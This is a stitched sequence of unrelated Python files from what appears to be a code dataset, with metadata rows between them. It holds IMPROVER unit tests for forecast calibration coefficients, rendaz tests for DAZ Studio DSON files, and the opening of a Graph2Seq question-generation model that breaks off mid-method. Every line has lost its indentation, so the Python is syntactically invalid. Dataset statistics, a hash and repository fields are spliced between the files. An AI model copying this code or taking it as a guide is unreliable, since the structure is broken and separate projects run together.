# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Unit tests for the
`ensemble_calibration.CalibratedForecastDistributionParameters`
class.
"""
import unittest
import numpy as np
from iris.cube import CubeList
from iris.tests import IrisTest
from numpy.testing import assert_array_almost_equal
from improver.calibration.ensemble_calibration import (
CalibratedForecastDistributionParameters as Plugin,
)
from improver.calibration.ensemble_calibration import (
EstimateCoefficientsForEnsembleCalibration,
)
from improver.metadata.constants.attributes import MANDATORY_ATTRIBUTE_DEFAULTS
from improver.synthetic_data.set_up_test_cubes import set_up_variable_cube
from improver.utilities.warnings_handler import ManageWarnings
from .helper_functions import EnsembleCalibrationAssertions, SetupCubes
from .test_EstimateCoefficientsForEnsembleCalibration import SetupExpectedCoefficients
class SetupCoefficientsCubes(SetupCubes, SetupExpectedCoefficients):
"""Set up coefficients cubes for testing."""
@ManageWarnings(
ignored_messages=[
"Collapsing a non-contiguous coordinate.",
"invalid escape sequence",
],
warning_types=[UserWarning, DeprecationWarning],
)
def setUp(self):
"""Set up coefficients cubes for when either the ensemble mean or the
ensemble realizations have been used as the predictor. The coefficients
have been constructed from the same underlying set of ensemble
realizations, so application of these coefficients would be expected
to give similar results. The values for the coefficients used to
construct the coefficients cubes are taken from the
SetupExpectedCoefficients class. These coefficients are the
expected outputs from the tests to estimate the coefficients."""
super().setUp()
# Set up a coefficients cube when using the ensemble mean as the
# predictor.
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", desired_units="Celsius"
)
self.coeffs_from_mean = estimator.create_coefficients_cubelist(
self.expected_mean_pred_norm,
self.historic_temperature_forecast_cube,
CubeList([self.historic_temperature_forecast_cube]),
)
# Set up a timeshifted coefficients cube using the ensemble mean as a
# predictor.
forecast_timeshift_cube = self.historic_temperature_forecast_cube.copy()
for coord_name in ["time", "forecast_period"]:
forecast_timeshift_cube.coord(coord_name).points = [
_ + 3600 for _ in forecast_timeshift_cube.coord(coord_name).points
]
self.coeffs_from_mean_timeshift = estimator.create_coefficients_cubelist(
self.expected_mean_pred_norm,
forecast_timeshift_cube,
CubeList([forecast_timeshift_cube]),
)
# Set up a coefficients cube when using the ensemble mean as the
# predictor and separate coefficients at each point.
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", point_by_point=True, desired_units="Celsius"
)
point_by_point_predictor = np.stack(
[self.expected_mean_pred_norm] * 9
).T.reshape(4, 3, 3)
self.coeffs_from_mean_point_by_point = estimator.create_coefficients_cubelist(
point_by_point_predictor,
self.historic_temperature_forecast_cube,
CubeList([self.historic_temperature_forecast_cube]),
)
# Set up a coefficients cube when using the ensemble realization as the
# predictor.
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", desired_units="Celsius", predictor="realizations"
)
self.coeffs_from_realizations = estimator.create_coefficients_cubelist(
self.expected_realizations_norm,
self.historic_temperature_forecast_cube,
CubeList([self.historic_temperature_forecast_cube]),
)
# Set up a coefficients cube when using the ensemble realization as the
# predictor and separate coefficients at each point.
expected_realizations_each_site = [
array if array.ndim == 1 else np.squeeze(array)
for array in list(self.expected_realizations_each_site.values())
]
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", predictor="realizations", point_by_point=True
)
self.coeffs_from_realizations_sites = estimator.create_coefficients_cubelist(
expected_realizations_each_site,
self.historic_forecast_spot_cube,
CubeList([self.historic_temperature_forecast_cube]),
)
# # Set up a coefficients cube when using an additional predictor.
self.altitude = set_up_variable_cube(
np.ones((3, 3), dtype=np.float32), name="surface_altitude", units="m"
)
for coord in ["time", "forecast_reference_time", "forecast_period"]:
self.altitude.remove_coord(coord)
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", desired_units="Celsius"
)
self.coeffs_from_mean_alt = estimator.create_coefficients_cubelist(
self.expected_mean_pred_norm_alt,
self.historic_temperature_forecast_cube,
CubeList([self.historic_temperature_forecast_cube, self.altitude]),
)
# Some expected data that are used in various tests.
self.expected_loc_param_mean = np.array(
[
[273.7014, 274.6534, 275.4469],
[276.9385, 277.7636, 278.5570],
[279.6996, 280.1122, 281.2547],
],
dtype=np.float32,
)
self.expected_scale_param_mean = np.array(
[
[0.2316, 0.2342, 0.0168],
[0.0271, 0.0237, 0.0168],
[0.0634, 0.1151, 0.0116],
],
dtype=np.float32,
)
self.expected_loc_param_realizations = np.array(
[
[274.388, 275.3053, 275.4492],
[277.1295, 277.3866, 278.4672],
[280.2007, 280.3929, 281.2602],
],
dtype=np.float32,
)
self.expected_loc_param_realizations_sites = np.array(
[277.7531, 277.4529, 277.553, 277.2528], dtype=np.float32,
)
self.expected_scale_param_realizations_sites = np.array(
[0, 0, 0, 0], dtype=np.float32
)
self.expected_loc_param_mean_alt = np.array(
[
[275.18134, 276.18134, 277.01465],
[278.58133, 279.44797, 280.2813],
[281.48132, 281.91464, 283.11465],
],
dtype=np.float32,
)
self.expected_scale_param_mean_alt = np.array(
[
[0.4347, 0.4396, 0.0308],
[0.0503, 0.0438, 0.0308],
[0.1184, 0.2157, 0.0211],
],
dtype=np.float32,
)
# Create output cubes with the expected data.
self.expected_loc_param_mean_cube = set_up_variable_cube(
self.expected_loc_param_mean,
name="location_parameter",
units="K",
attributes=MANDATORY_ATTRIBUTE_DEFAULTS,
)
self.expected_scale_param_mean_cube = set_up_variable_cube(
self.expected_scale_param_mean,
name="scale_parameter",
units="Kelvin^2",
attributes=MANDATORY_ATTRIBUTE_DEFAULTS,
)
class Test__init__(IrisTest):
"""Test the __init__ method."""
def test_basic(self):
"""Test without specifying a predictor."""
plugin = Plugin()
self.assertEqual(plugin.predictor, "mean")
def test_with_predictor(self):
"""Test specifying the predictor."""
plugin = Plugin(predictor="realizations")
self.assertEqual(plugin.predictor, "realizations")
class Test__repr__(IrisTest):
"""Test the __repr__ method."""
def test_basic(self):
"""Test without the predictor."""
result = str(Plugin())
msg = "<CalibratedForecastDistributionParameters: " "predictor: mean>"
self.assertEqual(result, msg)
def test_with_predictor(self):
"""Test specifying the predictor."""
result = str(Plugin(predictor="realizations"))
msg = "<CalibratedForecastDistributionParameters: " "predictor: realizations>"
self.assertEqual(result, msg)
class Test__spatial_domain_match(SetupCoefficientsCubes):
""" Test the _spatial_domain_match method."""
def setUp(self):
super().setUp()
self.plugin = Plugin()
def test_matching(self):
"""Test case in which spatial domains match."""
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
self.plugin._spatial_domain_match()
def test_unmatching_x_axis_points(self):
"""Test when the points of the x dimension do not match."""
self.current_temperature_forecast_cube.coord(axis="x").bounds = (
self.current_temperature_forecast_cube.coord(axis="x").bounds + 2.0
)
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
msg = "The points or bounds of the x axis given by the current forecast"
with self.assertRaisesRegex(ValueError, msg):
self.plugin._spatial_domain_match()
def test_unmatching_x_axis_bounds(self):
"""Test when the bounds of the x dimension do not match."""
self.current_temperature_forecast_cube.coord(axis="x").bounds = [
[-35, -5],
[-5, 5],
[5, 35],
]
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
msg = "The points or bounds of the x axis given by the current forecast"
with self.assertRaisesRegex(ValueError, msg):
self.plugin._spatial_domain_match()
def test_unmatching_y_axis(self):
"""Test case in which the y-dimensions of the domains do not match."""
self.current_temperature_forecast_cube.coord(axis="y").bounds = (
self.current_temperature_forecast_cube.coord(axis="y").bounds + 2.0
)
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
msg = "The points or bounds of the y axis given by the current forecast"
with self.assertRaisesRegex(ValueError, msg):
self.plugin._spatial_domain_match()
def test_skipping_spot_forecast(self):
"""Test passing a spot forecast. In this case, the spatial domain
is not checked."""
self.plugin.current_forecast = self.current_forecast_spot_cube
self.plugin._spatial_domain_match()
class Test__calculate_location_parameter_from_mean(
SetupCoefficientsCubes, EnsembleCalibrationAssertions
):
"""Test the __calculate_location_parameter_from_mean method."""
def setUp(self):
"""Set-up coefficients and plugin for testing."""
super().setUp()
self.plugin = Plugin()
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_basic(self):
"""Test that the expected values for the location parameter are
calculated when using the ensemble mean. These expected values are
compared to the results when using the ensemble realizations to ensure
that the results are similar."""
location_parameter = self.plugin._calculate_location_parameter_from_mean()
self.assertCalibratedVariablesAlmostEqual(
location_parameter, self.expected_loc_param_mean
)
assert_array_almost_equal(
location_parameter, self.expected_loc_param_realizations, decimal=0,
)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_missing_additional_predictor(self):
"""Test that an error is raised if an additional predictor is expected
based on the contents of the coefficients cube."""
self.plugin.coefficients_cubelist = self.coeffs_from_mean_alt
msg = "The number of forecast predictors must equal the number"
with self.assertRaisesRegex(ValueError, msg):
self.plugin._calculate_location_parameter_from_mean()
class Test__calculate_location_parameter_from_realizations(
SetupCoefficientsCubes, EnsembleCalibrationAssertions
):
"""Test the _calculate_location_parameter_from_realizations method."""
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def setUp(self):
"""Set-up coefficients and plugin for testing."""
super().setUp()
self.plugin = Plugin()
self.plugin.current_forecast = self.current_temperature_forecast_cube
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_basic(self):
"""Test that the expected values for the location parameter are
calculated when using the ensemble realizations. These expected values
are compared to the results when using the ensemble mean to ensure
that the results are similar."""
self.plugin.coefficients_cubelist = self.coeffs_from_realizations
location_parameter = (
self.plugin._calculate_location_parameter_from_realizations()
)
self.assertCalibratedVariablesAlmostEqual(
location_parameter, self.expected_loc_param_realizations
)
assert_array_almost_equal(
location_parameter, self.expected_loc_param_mean, decimal=0
)
class Test__calculate_scale_parameter(
SetupCoefficientsCubes, EnsembleCalibrationAssertions
):
"""Test the _calculate_scale_parameter method."""
def setUp(self):
"""Set-up the plugin for testing."""
super().setUp()
self.plugin = Plugin()
self.plugin.current_forecast = self.current_temperature_forecast_cube
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_basic(self):
"""Test the scale parameter is calculated correctly."""
self.plugin.coefficients_cubelist = self.coeffs_from_mean
scale_parameter = self.plugin._calculate_scale_parameter()
self.assertCalibratedVariablesAlmostEqual(
scale_parameter, self.expected_scale_param_mean
)
class Test__create_output_cubes(SetupCoefficientsCubes, EnsembleCalibrationAssertions):
"""Test the _create_output_cubes method."""
def setUp(self):
"""Set-up the plugin for testing."""
super().setUp()
self.plugin = Plugin()
self.plugin.current_forecast = self.current_temperature_forecast_cube
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_basic(self):
"""Test that the cubes created containing the location and scale
parameter are formatted as expected."""
(
location_parameter_cube,
scale_parameter_cube,
) = self.plugin._create_output_cubes(
self.expected_loc_param_mean, self.expected_scale_param_mean
)
self.assertEqual(location_parameter_cube, self.expected_loc_param_mean_cube)
self.assertEqual(scale_parameter_cube, self.expected_scale_param_mean_cube)
class Test_process(SetupCoefficientsCubes, EnsembleCalibrationAssertions):
"""Test the process plugin."""
def setUp(self):
"""Set-up the plugin for testing."""
super().setUp()
self.plugin = Plugin()
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_diagnostic_match(self):
"""Test that an error is raised if the diagnostic_standard_name does
not match when comparing a forecast cube and coefficients cubelist."""
msg = "The forecast diagnostic"
with self.assertRaisesRegex(ValueError, msg):
self.plugin.process(
self.current_wind_speed_forecast_cube, self.coeffs_from_mean
)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_time_match(self):
"""Test that an error is raised if the time coordinates do
not match when comparing a forecast cube and coefficients cubelist."""
msg = "rounded forecast_period hours"
with self.assertRaisesRegex(ValueError, msg):
self.plugin.process(
self.current_temperature_forecast_cube, self.coeffs_from_mean_timeshift
)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_time_match_tolerate(self):
"""Test that no error is raised when using a coefficients file with
a mismatching forecast_period coordinate, if the
tolerate_time_mismatch option is enabled."""
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube,
self.coeffs_from_mean_timeshift,
tolerate_time_mismatch=True,
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data, self.expected_loc_param_mean
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_mean
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_variable_setting(self):
"""Test that the cubes passed into the plugin are allocated to
plugin variables appropriately."""
_, _ = self.plugin.process(
self.current_temperature_forecast_cube, self.coeffs_from_mean
)
self.assertEqual(
self.current_temperature_forecast_cube, self.plugin.current_forecast
)
self.assertEqual(self.coeffs_from_mean, self.plugin.coefficients_cubelist)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end(self):
"""An example end-to-end calculation. This repeats the test elements
above but all grouped together."""
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube, self.coeffs_from_mean
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data, self.expected_loc_param_mean
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_mean
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end_point_by_point(self):
"""An example end-to-end calculation when a separate set of
coefficients are computed for each grid point. This repeats the test
elements above but all grouped together."""
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube, self.coeffs_from_mean_point_by_point
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data, self.expected_loc_param_mean
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_mean
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end_point_by_point_sites_realizations(self):
"""An example end-to-end calculation when a separate set of
coefficients are computed for each site using the realizations as the
predictor. This repeats the test elements above but all grouped together."""
plugin = Plugin(predictor="realizations")
calibrated_forecast_predictor, calibrated_forecast_var = plugin.process(
self.current_forecast_spot_cube, self.coeffs_from_realizations_sites
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data,
self.expected_loc_param_realizations_sites,
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_realizations_sites
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end_with_additional_predictor(self):
"""Test that the expected calibrated forecast is generated, if an
additional predictor is provided."""
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube,
self.coeffs_from_mean_alt,
additional_fields=CubeList([self.altitude]),
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data, self.expected_loc_param_mean_alt
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_mean_alt
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end_with_mask(self):
"""An example end-to-end calculation, but making sure that the
areas that are masked within the landsea mask, are masked at the
end."""
# Construct a mask and encapsulate as a cube.
mask = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
mask_cube = self.current_temperature_forecast_cube[0].copy(data=mask)
# Convention for IMPROVER is that land points are ones and sea points
# are zeros in land-sea masks. In this case we want to mask sea points.
expected_mask = np.array(
[[False, True, True], [True, False, True], [True, True, False]]
)
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube,
self.coeffs_from_mean,
landsea_mask=mask_cube,
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data.data, self.expected_loc_param_mean
)
self.assertArrayEqual(calibrated_forecast_predictor.data.mask, expected_mask)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data.data, self.expected_scale_param_mean
)
self.assertArrayEqual(calibrated_forecast_var.data.mask, expected_mask)
if __name__ == "__main__":
unittest.main()
| 42.294613
| 88
| 0.690841
| 22,536
| 0.897027
| 0
| 0
| 17,265
| 0.687219
| 0
| 0
| 7,823
| 0.311388
|
2207cb5f7d7e3d98709c2a6697f808bd842caf1c
| 2,897
|
py
|
Python
|
rendaz/tests/test_daztools.py
|
veselosky/rendaz
|
c81298cb9b8f142c4748c28b7e93549a56ee248d
|
[
"Apache-2.0"
] | null | null | null |
rendaz/tests/test_daztools.py
|
veselosky/rendaz
|
c81298cb9b8f142c4748c28b7e93549a56ee248d
|
[
"Apache-2.0"
] | null | null | null |
rendaz/tests/test_daztools.py
|
veselosky/rendaz
|
c81298cb9b8f142c4748c28b7e93549a56ee248d
|
[
"Apache-2.0"
] | null | null | null |
"Test handling/parsing of various DAZ Studio files"
from pathlib import Path
from tempfile import NamedTemporaryFile
from django.apps import apps
from rendaz.daztools import (
DSONFile,
ProductMeta,
manifest_files,
supplement_product_name,
)
TEST_DIR = Path(__file__).parent
def test_read_dson_compressed():
"Test reading compressed DSON files"
fname = TEST_DIR / "Sphere-compressed.duf"
duf = DSONFile(path=str(fname))
assert duf.path.name == "Sphere-compressed.duf"
assert duf.is_compressed
assert "asset_info" in duf.dson
def test_read_dson_uncompressed():
"Test reading uncompressed DSON files"
fname = TEST_DIR / "Sphere-uncompressed.duf"
duf = DSONFile(path=str(fname))
assert duf.path.name == "Sphere-uncompressed.duf"
assert duf.is_compressed is False
assert "asset_info" in duf.dson
def test_save_dson_compressed():
"Test write round trip, read uncompressed, write compressed, read back"
fname = TEST_DIR / "Sphere-uncompressed.duf"
duf = DSONFile(path=str(fname))
out = NamedTemporaryFile(mode="wt", delete=False)
tmpname = out.name
out.close()
try:
duf.save(tmpname, compress=True)
new = DSONFile(tmpname)
assert new.is_compressed
assert "asset_info" in new.dson
finally:
Path(tmpname).unlink()
def test_save_dson_uncompressed():
"Test write round trip, read compressed, write uncompressed, read back"
fname = TEST_DIR / "Sphere-compressed.duf"
duf = DSONFile(path=str(fname))
out = NamedTemporaryFile(mode="wt", delete=False)
tmpname = out.name
out.close()
try:
duf.save(tmpname, compress=False)
new = DSONFile(tmpname)
assert new.is_compressed is False
assert "asset_info" in new.dson
finally:
Path(tmpname).unlink()
def test_productmetafile_defaults():
production = apps.get_app_config("production")
it = ProductMeta(product_id="THETHING", stem_product_name="THETHING")
assert it.product_id == "THETHING"
assert isinstance(it.cms_files, set)
assert isinstance(it.dim_manifest_files, set)
assert isinstance(it.included_files, set)
def test_manifest_files():
expected = [
"Content/People/Genesis 8 Female/Characters/Aakash.duf",
"Content/People/Genesis 8 Female/Characters/Aakash.duf.png",
"Content/Runtime/Support/DAZ_3D_60599_Aakash_HD_for_Kala_8.dsa",
"Content/Runtime/Support/DAZ_3D_60599_Aakash_HD_for_Kala_8.dsx",
"Content/Runtime/Support/DAZ_3D_60599_Aakash_HD_for_Kala_8.jpg",
]
fname = TEST_DIR / "Manifest.dsx"
actual = list(manifest_files(fname))
assert actual == expected
def test_supplement_product_name():
expected = "Aakash HD for Kala 8"
fname = TEST_DIR / "Supplement.dsx"
actual = supplement_product_name(fname)
assert actual == expected
| 29.561224
| 75
| 0.705557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 864
| 0.29824
|
2209880d39d84bdcf0ec5ef896046b892fe747ab
| 20,000
|
py
|
Python
|
src/core/models/graph2seq.py
|
talha1503/RL-based-Graph2Seq-for-NQG
|
1039e0b6231ae7029ea6e4073b1e55df5ad2e928
|
[
"Apache-2.0"
] | 100
|
2019-08-18T21:56:24.000Z
|
2022-03-31T08:54:41.000Z
|
src/core/models/graph2seq.py
|
talha1503/RL-based-Graph2Seq-for-NQG
|
1039e0b6231ae7029ea6e4073b1e55df5ad2e928
|
[
"Apache-2.0"
] | 7
|
2019-12-26T03:49:20.000Z
|
2021-11-26T19:11:19.000Z
|
src/core/models/graph2seq.py
|
talha1503/RL-based-Graph2Seq-for-NQG
|
1039e0b6231ae7029ea6e4073b1e55df5ad2e928
|
[
"Apache-2.0"
] | 17
|
2020-02-02T06:41:21.000Z
|
2022-03-09T02:53:27.000Z
|
import random
import string
from typing import Union, List
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..layers.common import EncoderRNN, DecoderRNN, dropout
from ..layers.attention import *
from ..layers.graphs import GraphNN
from ..utils.generic_utils import to_cuda, create_mask
from ..utils.constants import VERY_SMALL_NUMBER
class Graph2SeqOutput(object):
def __init__(self, encoder_outputs, encoder_state, decoded_tokens, \
loss=0, loss_value=0, enc_attn_weights=None, ptr_probs=None):
self.encoder_outputs = encoder_outputs
self.encoder_state = encoder_state
self.decoded_tokens = decoded_tokens # (out seq len, batch size)
self.loss = loss # scalar
self.loss_value = loss_value # float value, excluding coverage loss
self.enc_attn_weights = enc_attn_weights # (out seq len, batch size, src seq len)
self.ptr_probs = ptr_probs # (out seq len, batch size)
class Graph2Seq(nn.Module):
def __init__(self, config, word_embedding, word_vocab):
"""
:param word_vocab: mainly for info about special tokens and word_vocab size
:param config: model hyper-parameters
:param max_dec_steps: max num of decoding steps (only effective at test time, as during
training the num of steps is determined by the `target_tensor`); it is
safe to change `self.max_dec_steps` as the network architecture is
independent of src/tgt seq lengths
Create the graph2seq model; its encoder and decoder will be created automatically.
"""
super(Graph2Seq, self).__init__()
self.name = 'Graph2Seq'
self.device = config['device']
self.word_dropout = config['word_dropout']
self.edge_dropout = config['edge_dropout']
self.bert_dropout = config['bert_dropout']
self.word_vocab = word_vocab
self.vocab_size = len(word_vocab)
self.f_case = config['f_case']
self.f_pos = config['f_pos']
self.f_ner = config['f_ner']
self.f_freq = config['f_freq']
self.f_dep = config['f_dep']
self.f_ans = config['f_ans']
self.dan_type = config.get('dan_type', 'all')
self.max_dec_steps = config['max_dec_steps']
self.rnn_type = config['rnn_type']
self.enc_attn = config['enc_attn']
self.enc_attn_cover = config['enc_attn_cover']
self.dec_attn = config['dec_attn']
self.pointer = config['pointer']
self.pointer_loss_ratio = config['pointer_loss_ratio']
self.cover_loss = config['cover_loss']
self.cover_func = config['cover_func']
self.message_function = config['message_function']
self.use_bert = config['use_bert']
self.use_bert_weight = config['use_bert_weight']
self.use_bert_gamma = config['use_bert_gamma']
self.finetune_bert = config.get('finetune_bert', None)
bert_dim = (config['bert_dim'] if self.use_bert else 0)
enc_hidden_size = config['rnn_size']
if config['dec_hidden_size']:
dec_hidden_size = config['dec_hidden_size']
if self.rnn_type == 'lstm':
self.enc_dec_adapter = nn.ModuleList([nn.Linear(enc_hidden_size, dec_hidden_size) for _ in range(2)])
else:
self.enc_dec_adapter = nn.Linear(enc_hidden_size, dec_hidden_size)
else:
dec_hidden_size = enc_hidden_size
self.enc_dec_adapter = None
enc_input_dim = config['word_embed_dim']
self.word_embed = word_embedding
if config['fix_word_embed']:
print('[ Fix word embeddings ]')
for param in self.word_embed.parameters():
param.requires_grad = False
self.edge_embed = nn.Embedding(config['num_edge_types'], config['edge_embed_dim'], padding_idx=0)
if self.f_case:
self.case_embed = nn.Embedding(3, config['case_embed_dim'], padding_idx=0)
enc_input_dim += config['case_embed_dim']
if self.f_pos:
self.pos_embed = nn.Embedding(config['num_features_f_pos'], config['pos_embed_dim'], padding_idx=0)
enc_input_dim += config['pos_embed_dim']
if self.f_ner:
self.ner_embed = nn.Embedding(config['num_features_f_ner'], config['ner_embed_dim'], padding_idx=0)
enc_input_dim += config['ner_embed_dim']
if self.f_freq:
self.freq_embed = nn.Embedding(4, config['freq_embed_dim'], padding_idx=0)
enc_input_dim += config['freq_embed_dim']
if self.f_dep:
self.edge_embed = nn.Embedding(config['num_edge_types'], config['edge_embed_dim'], padding_idx=0)
enc_input_dim += config['edge_embed_dim']
if self.f_ans and self.dan_type in ('all', 'word'):
enc_input_dim += config['word_embed_dim']
if self.use_bert:
enc_input_dim += config['bert_dim']
if self.use_bert and self.use_bert_weight:
num_bert_layers = config['bert_layer_indexes'][1] - config['bert_layer_indexes'][0]
self.logits_bert_layers = nn.Parameter(nn.init.xavier_uniform_(torch.Tensor(1, num_bert_layers)))
if self.use_bert_gamma:
self.gamma_bert_layers = nn.Parameter(nn.init.constant_(torch.Tensor(1, 1), 1.))
config['gl_input_size'] = enc_input_dim
self.ctx_rnn_encoder = EncoderRNN(enc_input_dim, enc_hidden_size, bidirectional=config['enc_bidi'], num_layers=config['num_enc_rnn_layers'], rnn_type=self.rnn_type,
rnn_dropout=config['enc_rnn_dropout'], device=self.device)
# Deep answer alignment
if self.f_ans:
if self.dan_type in ('all', 'word'):
self.ctx2ans_attn_l1 = Context2AnswerAttention(config['word_embed_dim'], config['hidden_size'])
if self.dan_type in ('all', 'hidden'):
self.ans_rnn_encoder = EncoderRNN(config['word_embed_dim'] + bert_dim, enc_hidden_size, bidirectional=config['enc_bidi'], num_layers=config['num_enc_rnn_layers'], rnn_type=self.rnn_type,
rnn_dropout=config['enc_rnn_dropout'], device=self.device)
self.ctx2ans_attn_l2 = Context2AnswerAttention(config['word_embed_dim'] + config['hidden_size'] + bert_dim, config['hidden_size'])
self.ctx_rnn_encoder_l2 = EncoderRNN(2 * enc_hidden_size, enc_hidden_size, bidirectional=config['enc_bidi'], num_layers=config['num_enc_rnn_layers'], rnn_type=self.rnn_type,
rnn_dropout=config['enc_rnn_dropout'], device=self.device)
print('[ Using Deep Answer Alignment Network: {} ]'.format(self.dan_type))
self.graph_encoder = GraphNN(config)
self.decoder = DecoderRNN(self.vocab_size, config['word_embed_dim'], dec_hidden_size, rnn_type=self.rnn_type,
enc_attn=config['enc_attn'], dec_attn=config['dec_attn'],
pointer=config['pointer'], out_embed_size=config['out_embed_size'],
tied_embedding=self.word_embed if config['tie_embed'] else None,
in_drop=config['dec_in_dropout'], rnn_drop=config['dec_rnn_dropout'],
out_drop=config['dec_out_dropout'], enc_hidden_size=enc_hidden_size, device=self.device)
def filter_oov(self, tensor, ext_vocab_size):
"""Replace any OOV index in `tensor` with UNK"""
if ext_vocab_size and ext_vocab_size > self.vocab_size:
result = tensor.clone()
result[tensor >= self.vocab_size] = self.word_vocab.UNK
return result
return tensor
def get_coverage_vector(self, enc_attn_weights):
"""Combine the past attention weights into one vector"""
if self.cover_func == 'max':
coverage_vector, _ = torch.max(torch.cat(enc_attn_weights), dim=0)
elif self.cover_func == 'sum':
coverage_vector = torch.sum(torch.cat(enc_attn_weights), dim=0)
else:
raise ValueError('Unrecognized cover_func: ' + self.cover_func)
return coverage_vector
def forward(self, ex, target_tensor=None, criterion=None, criterion_reduction=True, criterion_nll_only=False, \
rl_loss=False, *, forcing_ratio=0, partial_forcing=True, \
ext_vocab_size=None, sample=False, saved_out: Graph2SeqOutput=None, \
visualize: bool=None, include_cover_loss: bool=False) -> Graph2SeqOutput:
"""
:param input_tensor: tensor of word indices, (batch size, src seq len)
:param target_tensor: tensor of word indices, (batch size, tgt seq len)
:param input_lengths: see explanation in `EncoderRNN`
:param criterion: the loss function; if set, loss will be returned
:param forcing_ratio: see explanation in `Params` (requires `target_tensor`, training only)
:param partial_forcing: see explanation in `Params` (training only)
:param ext_vocab_size: see explanation in `DecoderRNN`
:param sample: if True, the returned `decoded_tokens` will be based on random sampling instead
of greedily selecting the token of the highest probability at each step
:param saved_out: the output of this function in a previous run; if set, the encoding step will
be skipped and we reuse the encoder states saved in this object
:param visualize: whether to return data for attention and pointer visualization; if None,
return if no `criterion` is provided
:param include_cover_loss: whether to include coverage loss in the returned `loss_value`
Run the graph2seq model for training or testing.
"""
input_tensor = ex['context']
input_lengths = ex['context_lens']
batch_size, input_length = input_tensor.shape
input_mask = create_mask(input_lengths, input_length, self.device)
log_prob = not (sample or self.decoder.pointer) # don't apply log too soon in these cases
if visualize is None:
visualize = criterion is None
if visualize and not (self.enc_attn or self.pointer):
visualize = False # nothing to visualize
if target_tensor is None:
target_length = self.max_dec_steps
target_mask = None
else:
target_tensor = target_tensor.transpose(1, 0)
target_length = target_tensor.size(0)
target_mask = create_mask(ex['target_lens'], target_length, self.device)
if forcing_ratio == 1:
# if fully teacher-forced, it may be possible to eliminate the for-loop over decoder steps
# for generality, this optimization is not investigated
use_teacher_forcing = True
elif forcing_ratio > 0:
if partial_forcing:
use_teacher_forcing = None # decide later individually in each step
else:
use_teacher_forcing = random.random() < forcing_ratio
else:
use_teacher_forcing = False
if saved_out: # reuse encoder states of a previous run
encoder_outputs = saved_out.encoder_outputs
encoder_state = saved_out.encoder_state
assert input_length == encoder_outputs.size(0)
assert batch_size == encoder_outputs.size(1)
else: # run the encoder
# encoder_embedded: (batch size, input len, embed size)
encoder_embedded = self.word_embed(self.filter_oov(input_tensor, ext_vocab_size))
encoder_embedded = dropout(encoder_embedded, self.word_dropout, shared_axes=[-2], training=self.training)
enc_input_cat = [encoder_embedded]
if self.f_case:
case_features = self.case_embed(ex['context_case'])
enc_input_cat.append(case_features)
if self.f_pos:
pos_features = self.pos_embed(ex['context_pos'])
enc_input_cat.append(pos_features)
if self.f_ner:
ner_features = self.ner_embed(ex['context_ner'])
enc_input_cat.append(ner_features)
if self.f_freq:
